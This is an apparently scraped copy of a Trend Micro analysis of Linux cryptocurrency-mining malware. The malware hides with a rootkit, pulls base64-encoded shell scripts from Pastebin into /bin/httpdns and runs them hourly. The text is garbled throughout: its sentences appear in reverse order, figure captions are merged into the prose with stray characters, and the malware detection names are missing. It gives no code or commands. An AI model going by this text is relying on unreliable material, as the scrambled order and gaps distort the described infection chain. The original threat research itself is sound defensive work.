Once executed, the shell script first checks whether there is an update available for the malware. After decoding, the resulting file is also a shell script that is executed by /bin/ httpdns.įigure 2: How the shell script is downloaded and saved bin/ httpdns contains a shell script that connects and downloads another base64-encoded text file. Lastly, the downloaded shell script is executed.
A scheduled task is created to run /bin/ httpdns every hour. The downloaded file, which is a shell script, is saved as /bin/ httpdns. The initial file ( ) connects and downloads a file from Pastebin. It’s not an uncommon vector, as other Linux cryptocurrency-mining malware tools have also used this as an entry point.įigure 1: The cryptocurrency-mining malware’s infection chain Installing one entails granting it admin rights, and in the case of compromised applications, malware can run with the privileges granted to the application. We construe that this cryptocurrency-mining malware’s infection vector is a malicious, third-party/unofficial or compromised plugin (i.e., media-streaming software). Interestingly, the permission model in Unix and Unix-like operating systems like Linux make it tricky to run executables with privileges. The malware is also capable of updating and upgrading itself and its configuration file. This makes it difficult to detect, as infected systems will only indicate performance issues. It is notable for being bundled with a rootkit component ( ) that hides the malicious process’ presence from monitoring tools. We recently encountered a cryptocurrency-mining malware (detected by Trend Micro as ) affecting Linux systems. Indeed, this kind of threat is one of Trend Micro's most consistently detected malware, affecting a wide range of platforms and devices. With the popularity of cryptocurrencies, it is no surprise that cybercriminals continue to develop and fine-tune various cryptocurrency-mining malware. By Augusto II Remillano, Kiyoshi Obuchi, and Arvin Roi Macaraeg
0 kommentar(er)
